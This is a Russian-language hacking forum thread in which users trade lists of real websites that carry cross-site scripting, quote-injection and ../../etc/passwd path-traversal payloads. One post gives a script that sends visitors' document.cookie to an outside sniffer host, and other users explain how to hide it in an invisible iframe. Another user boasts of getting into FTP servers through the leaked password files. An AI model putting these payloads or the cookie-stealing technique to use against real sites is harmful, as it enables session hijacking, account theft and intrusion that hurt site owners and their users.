|
пока нашол раскрытие пути, щас еще поищу
Warning: Cannot modify header information - headers already sent by (output started at /var/www/hackthissite.org/html/includes/layout/header.php:12) in /var/www/hackthissite.org/html/pages/articles/read_article.php on line 21 You are not logged in! Redirection to: http://www.illgotten.net/view/390.phpIf you wish to view this article with added HTS functionality, please register/login in |
Это не бага, это ошибка которая говорит, что ты не зареган не залогинен.
Найдешь мне багу на этом сайте, буду у тебя в долгу. Это касается всех. Кто найдет багу на этом сайте, у того Белый Джордан будет официально в долгу. :rolleyes: Логин и пассворд для желающих. :rolleyes: zaq123qwerty:12345 |
http://megafon.buongiorno.com/megafo...ian/index.html где просят номер телефона (+7....)Можно вводить любой код
http://www.tefal.ru/tefal/magazine/recipe_results.asp?keyword=">%3Cscript%3Ealert%28% 29%3C%2Fscript%3E&selectName=&APPLIANCE=&SPECIAL_D IETS=&x=0&y=0 http://lafox.net/shop/?gid=73'"><script>alert()</script> http://www.hacktivist.net/anarchy/index.php?action=search' http://www.sexonly.ru/katalog.php?ganr=20' http://www.icq.com/icqchat/browse_folder.php?tid=30279";//--></script><script>alert()</script> http://www.download.com/3120-20_4-0.html?tag=srch&nid=1&qt=666&tg=dl-2001"><script>alert()</script> http://www.osmarket.ru/products/5' http://zubov.net/666"%20style=background:url(javascript:alert());". cfm?nft=1&t=5&p=1 http://drocher.ru/goods_list.php?rubric_id=14"><script>alert()</script> |
http://hosting.mail.ru/WhoisService.jsp?domain=<img%20style="background:u rl(vbscript:confirm())"> IE
|
Цитата:
Вот прочитал статью и сделал всё как тама : Код HTML:
<html>Сохранил всё на ХТМЛ, и поместил у себя на сайте,открыл эту страничку , алерт не кидает, и на лог снифера нечего не идёт , почему , что я так не делаю под правь меня? |
http://www.npj.ru/in/dura-lex-group/by/pvp/42564"%20style=background:url(javascript:alert()); "
http://www.uinc.ru/news/sendnews.php тема:" style=background:url(javascript:alert(1));" Сообщение:</textarea><script>alert(2)</script> Ваше имя:" style=background:url(javascript:alert(3));" Ваш E-mail:" style=background:url(javascript:alert(4));" Введите код, указанный на картинке: НЕ ввожим, жмем отправить получаем alert может быть это и активная xss, хз я не проверял. p.s. Tem в скрытом фрейме можешь просто написать <script>img = new Image(); img.src="http://antichat.ru/cgi-bin/s.jpg"+document.cookie;</script> а не видно, наверное потому он и скрытый |
Так или я рехнулся, или уже спать хочется, и я перестал сооброжать, а где этот скрытый фрейм. ((
Или мне проста надо создать фрейм ? |
Замени весь файл на
<iframe widht=0 height=0 frameborder=0 src=http:/// ></iframe> да и все дела |
|
<AD- me замени на <iframe
<AD- ame>замени на </iframe> почитай про фреймы.Возьми какой нить учебник и прочти, там немного читать, зато сразу разберешься что к чему |
хха -) отключи свою банерорезку -) у меня из-за Outpost'а такая же хрень.
|
Я про фреймы читал и знаю, но как эксплотировать нет, и у меня сейчас на часах 2 ночи, както не охота читать, вот мой код.
Код HTML:
<html> |
http://antichat.ru/cgi-bin/s.jpg?
вопрос должен в конце стоять.а так вроде все прально. у тебя должно три страницы 1-главная(в ней тока коды размещения фреймов) 2-Тело, то что будет видеть чел когда зайдет на твой сайт. 3-скрытый фрейм(тот что ты написал вверху) если у тебя ничо не получиться, я те завтра отпишу готовый пример. Цитата:
|
k1b0rg попробуй найти xcc на www.wwc.ru
|
http://www.footbolka.ru/catalog/index.php?ref=xren'
http://www.whoistar.com/content/view/55/1'/ http://narod.yandex.ru/userforum/message.xhtml?owner=[название_форума_жертвы]&message_id=3042605&thread_id=0&nickname=&email=&v ari=2<script>alert()</script> http://www.allpravo.ru/?id=88&type=0&query='" http://www.classis.ru/cgi-bin/links/...EE%F2%E7%FB%E2 http://www.refer.ru/menu?a=select_add&id="><script>alert()</script> http://test.msk.ru/cgi-bin/searchdip...3C%2Fscript%3E 2porter http://wwc.ru/index.php?do=search&ss...3C%2Fscript%3E |
|
http://www.mtve.com/index.php?Page=2"><script>alert()</script>
http://register.logitech.com/index.cfm?validate=1";</script><script>alert()</script> http://www.w3.org/Search/Mail/Public...3C%2Fscript%3E http://serial.com/?show=%3Cscript%3E...&submit=Search http://www.phpbuilder.com/snippet/browse.php?by=cat&cat=1"style=background:url(javas cript:alert());" http://poisk.ru/#"><script>alert()</script> http://an.aport.ru/scripts/template....e=referat&Rt=2 http://www.sexvideogid.ru/search.php...3C%2Fscript%3E http://www.ag.ru/cheats/baldurs_gate_2_throne_of_bhaal/15170"><script>alert()</script> http://catalog.aport.ru/rus/themes.aspx?id=1778'"><xz> http://multifon.ru/stm/stm_popup.php?pid=54&type=jpg&name=666&url="style= background:url(javascript:alert());" http://www.chestertonholdings.com/inquiry_handler.php отсутствует проверка полей http://www.iceberg.ru/services/?id=23'&parent=0 |
http://www.scriptsearch.com/cgi-bin/report.cgi?999=delete&ID=%3Cscript%3Ealert('XSS')% 3C/script%3E
|
http://1ps.ru/pr/ отсутствует проверка полей
http://seminar.spylog.ru/?rp=seminars/descr/15/ отсутствует проверка полей http://members.yadro.ru/banners/nowstate.php3?vbn_id=-1' http://hw.ru/hi-tech/Login.jsp?login='"><script>alert(1)</script>&password='"><script>alert(2)</script> http://www.srb.ru/search-results/?q=...d&ps=10&page=0 http://www.profits.ru/login.php?w=user&o=login&e=u' http://www.gf.ru/cgi-bin/podftp.cgi?hostname=<script>alert()</script> http://www.zerkalo.com/cgi-bin/mail/adduser.cgi вводим в дополнительно->наши новости:Разные словосочетания допустим '"><script>!! в поля email и имя, и получаем на выходе http://www.zerkalo.com/cgi-bin/mail/adduser.cgi со строкой/home/ztu22/dead.letter... Saved message in /home/ztu22/dead.letter http://smchat.ru/?s=reguser&login="><script>alert()</script> http://www.film.ru/search.asp?what=%...ot&mode=medium |
http://forum.utro.ru/newuser.php?Cat=<script>alert('xss')</script>
жмём "далее" - три xss |
Код:
http://go.mail.ru/frame.html?imgurl=...-bin/s.jpg?+oO[SNIFF.SUPER.PUPER-BOY.FORUM.ANTICHAT.RU]Oo&iid=aWAoanJ00EEJ&imgwidth=%3Cscript%3Ealert('www.xss.ru')%3C/script%3E&imgheight=%3Cscript%3EИ БАЧИМ ЧТО ПОЛУЧИЛОСЬ! |
http://64.233.161.104/search?hl=ru&q=http%3A%2F%2F64.233.161.104%2Fsearc h%3Fq%3Dcache%3AQxqYk3NwuhsJ%3Asunhi.us%2FphpBB2%2 Fviewtopic.php%253Fp%253D6440%2526sid%253D8719e7ad 6743826b960ef8d25f30cedc%2B111110A%2Fhttp%26hl%3De n%26start%3D113&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%B A+%D0%B2+Google&lr=
Гooгle Ошибка Мы сожалеем... ... но мы не можем обработать ваш запрос прямо сейчас. Компьютерный вирус или spywаre приложение пересылка нам автоматизированные запросы, и это появляется, что ваш компьютер или сеть был заражен. Мы восстановим ваш доступ как быстро как только возможно, так пробуют снова скоро. Пока суд да дело, вы, возможно, хотели бы бежать вирусный информатор или spywаre перевозчик мебели чтобы убедиться, что ваш компьютер свободен от вирусов и другого поддельного программного обеспечения. Мы извиняемся за неудобство, и надеемся, что мы увидимся снова на Google. |
Они саме по себе ошибки
Они саме по себе ошибки
Цитата:
|
Цитата:
Внимание! Эти сайты я опубликую в последний раз, т.к. растет недовольство против меня, я типо флудер, публикую тока из-за репцтации, сайты мои никому нах не нужны и т.д. В связи с этим, я публиковать сайты больше не буду. http://search.cstrike.ru/?search=' http://search.gamestone.ru/?search=<script>alert()</script> http://3mp3.ru/ru/search/text/?reque...pt%3E&what=all http://www.mestkom.ru/asp/search.asp?action=search не фильтруються поля http://holidayclub.inprogress.ru/catalog/index.php?flet="><script>alert()</script>&Co=4&Re=460 http://hotels.wia.ru/<script>alert()</script> http://encycl.accoona.ru/?word=%3Csc...3C%2Fscript%3E http://www.bioone.org/bioone/?request=<script>alert()</script> http://www.openhardware.net/?file=<script>alert()</script> http://www.avionicsmagazine.com/cgi/.../../etc/passwd http://www.lamuv.de/cgi-bin/store.cg.../../etc/passwd http://alumni.calstatela.edu/documen.../../etc/passwd http://www.optimize.nl/site/jsp/print.jsp?file=<script>alert()</script> http://www.linuxhq.com/perl-bin/sear...7&qid=4&spp=20 |
http://rusoft.net/index.php?w=1133178547&cat=0&razdel=<script>alert(/xss/)</script>
|
не фига себе не нужны, я себе 9 Ftp поднял
|
на пассивном хсс???)))))
|
нет, на /etc/passwd не все же умные, и ставят пароль и логин разные, есть и иные... их зовут - лолы
|
нашол уязвимость
http://www.kalitva.ru/_/?vs=<script>javascript:alert('')</script>foto/look&id=2710&razdel=7&page=27 ps незнаю как использовать !!! =)))) |
Tikson Причём тут Бажные сайты от k1b0rg'a?=))
Полно инфы есть везде по ипользованию Пассивных XSS. Вот статейку почитай. _http://dante.net.ru/forum/showthread.php?t=225 Не забываем про репутацию, если помог ;-) За наводку=))))))))) |
=(
новодка эта уже была ..... =)))
ps вот **ня полная почему у всех этот Damage Lab НЕНАВИЖУ его а именное его создателя винукса дружили дружили с ним а потом бац и все ... гад он !!! ps ps а еще есть где-нибуть почитать про это??? ps ps ps а то что я нашол это вообще считается уязвимостью ???? |
Еще один в коллекцию...
http://www.pages.ru/search.html?text...CD%E0%E9%F2%E8 |
http://www.atlasofscience.org/main/v...3C%2Fscript%3E
http://www.atlasofscience.org/main/vacancy/vacancy.php?mesid=' http://vz.ru/search/?action=search&s_string="><h1>lol</h1> |
Ну вот например:
http://ля-ля-тополя<script>alert()</script> И что с этим дальше можно делать? Свой скрипт вставить мона, или что-то еще? (я только начал :)) |
vovanAdam Уже обсуждалось. Юзай поиск. А если что-то захотел спросить, то создавай отделюную тему. Твой вопрос к Бажным сайтам от Киборга не имеет ни кокого отношения!
|
rap.ru - <script>alert('lol')</script> v stroke poiska ))
_http://delit.net/search/search_result.phtml?sstr='><script>alert(/lol/)</script>&skind=' potom kliknite na luboj ssylke, vyletaet alert _http://search.espn.go.com/keyword/searchESPNShop?searchString=XSS _http://app.abc.go.com/keyword/searchResults?search=%3Cscript%3Ealert%28%27lol%27 %29%3C%2Fscript%3E&searchType=0 |
| Время: 04:44 |